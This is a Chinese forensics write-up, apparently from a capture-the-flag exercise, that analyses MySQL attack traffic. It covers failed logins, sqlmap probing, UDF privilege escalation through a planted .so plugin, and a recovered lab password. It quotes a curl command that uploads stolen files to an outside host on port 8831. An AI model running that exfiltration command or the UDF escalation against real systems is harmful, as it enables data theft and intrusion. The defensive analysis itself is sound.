当前位置: 首页 > wzjs >正文

江西做网站多少钱东莞常平镇邮政编码

江西做网站多少钱,东莞常平镇邮政编码,wordpress获取用户信息,wordpress产品模板问题: 攻击者登录Mysql失败多少次?提交答案例如:123攻击者执行的第一个命令返回的结果是什么?提交的字符串例如:www-data攻击者通过UDF提权的方式上传了一个插件,提交该插件的小写md5值。该插件被写入到什…

问题:

  1. 攻击者登录Mysql失败多少次?提交答案例如:123
  2. 攻击者执行的第一个命令返回的结果是什么?提交的字符串例如:www-data
  3. 攻击者通过UDF提权的方式上传了一个插件,提交该插件的小写md5值。
  4. 该插件被写入到什么位置?提交答案例如:/usr/lib/mysql.elf
  5. 攻击者窃取了哪些文件?提交的文件名称全小写,并根据小写字母的顺序进行提交,例如:aa.txt-ab.txt-cc.txt
  6. 攻击者得知数据库中第一个用户的登录密码为?提交密码字符串。

在这里插入图片描述

1.攻击者登录Mysql失败多少次

使用mysql.error_code== 1045,如果忘记了这个命令可以先mysql.查看

在这里插入图片描述
然后看右下角显示140次
在这里插入图片描述

2.攻击者执行的第一个命令返回的结果是什么

我们可以利用上题发现的ip信息,来进一步过滤来追踪攻击者,要知道攻击者执行的第一个命令返回的结果是什么,那我们就得过滤1045的登录失败流量信息,先大体扫一遍,发现只有mysql是返回正常的
在这里插入图片描述
在这里插入图片描述
再过滤mysql
在这里插入图片描述
随便找一个Response ok的包,追踪tcp
在这里插入图片描述

发现SELECT DATABASE(),那么可以肯定的是,这个攻击者拿sqlmap扫了
再下一步查找的时候,发现很可疑的sys_eval,去解一下,发现执行了hostname -l,且回显ip
在这里插入图片描述

3.攻击者通过UDF提权的方式上传了一个插件,提交该插件的小写md5值

UDF提权关注.so文件,一搜索就知道了该文件名称libsdhke.so,再去一些在线加密的网站即可
在这里插入图片描述

4.该插件被写入到什么位置?

UDF提权的核心在于通过MySQL加载自定义的动态链接库(如 .dll 或 .so 文件),这些库中包含可以执行系统命令的函数。攻击者通过在MySQL中注册这些函数,然后调用它们来执行系统命令
那么就得关注那些 .so 文件或者 .dll 了
一搜就知道位置了
在这里插入图片描述

5.攻击者窃取了哪些文件?提交的文件名称全小写,并根据小写字母的顺序进行提交

再继续下滑的时候,分析此处,发现一个/tmp/info.zip 文件被创建,且包含 VPNUser 目录及其内容

在这里插入图片描述
继续分析
再此处,发现了一个文件上传的操作
在这里插入图片描述
操作如下

curl -F "file=@/tmp/info.zip" http://x.x.x.x:8831/

那么就可以确定,此处毫无疑问就是有问题的

6.攻击者得知数据库中第一个用户的登录密码

在这里我们可以知道攻击者找到了root用户,继续利用root分析
在这里插入图片描述

在此处已经登录上了root账号,那么得知密码一定在此处流量的上处

在这里插入图片描述
发现只有开头处的那一大串最可疑,对此处分析,发现包含了MySQL 连接信息和用户认证数据的日志。这段日志显示了 root 用户的认证方式和一些客户端连接的详细信息:

  1. MySQL 版本
    5.6.7-rc
    这是 MySQL 的版本号,表示当前运行的 MySQL 版本是 5.6.7
  2. 用户认证信息
    root…Q…T.qt.8]g.mysql.mysql_native_password
    用户名是 root。
    认证方式是 mysql_native_password,查询后得知,这是 MySQL 默认的密码哈希算法。
  3. 密码应该是
    !Sq9O0Bm&b"p.
  4. 客户端连接信息
    _client_name.pymysql._pid.14934._client_version.1.0.2
    这部分内容表明:
    客户端名称是 pymysql,这是一个 Python 的 MySQL 客户端库。
    客户端进程 ID 是 14934。
    客户端版本是 1.0.2。

小补充

在这里感谢小破站的清风拂月师傅分析的该流量包

http://www.dtcms.com/wzjs/601802.html

相关文章:

  • 亚马逊做网站发礼物换评价专业网站建设培训机构
  • 自建网站平台的页面功能wordpress searchform
  • 公司网站页面加密查询网站流量排名
  • icp备案网站接入信息ip地址段网站的背景图怎么做的
  • 在线用代码做网站事业单位建立网站
  • 网站建设 徐州蓬莱市建设局网站
  • 旅游网站设计图wordpress用户注册邮件验证
  • 网站怎么做推广门户网站建设公司
  • 外贸高端网站开发南通企业自助建站
  • 网站规划建设前期规划方案电商网站怎么做推广
  • 做网站域名费向哪里交广州网站建设信科分公司
  • 大连网络营销网站潍坊住房和城乡建设厅网站
  • 网站客户运营织梦网站模版下载
  • 珠海网站管理公司中山视角做网站的公司
  • 台州市知名专业做网站做企业信用贷的网站
  • 怎么推广我的网站吗搭建wordpress需要php环境吗
  • 梅州建站联系方式内蒙古城乡建设厅网站资质公告
  • 西安至诚网站建设做网站客户总是要退款
  • 怎样建立微网站凡科快图在线
  • 网站自己做还是用程序WordPress怎样创建登录页面
  • 做网站需要用什么技术网站建设一般要多大空间
  • 深圳seo网站排名优化小程序一般用什么语言开发
  • 杭州网企业网站建设高性能网站建设指南pdf
  • 东莞住房和城乡建设网佛山百度关键词seo外包
  • 做优惠券网站要多少钱中山百度推广公司
  • 网站 域名 授权服务器 分布式黑龙江省关于城市建设政策网站
  • 潍坊建设gc局网站杭州做企业网站的公司
  • 企业做网站 乐云seo大学生电商创业项目
  • 智能手机网站模板网络设计应该考虑的原则有哪些
  • 厦门中国建设银行招聘信息网站app开发公司网站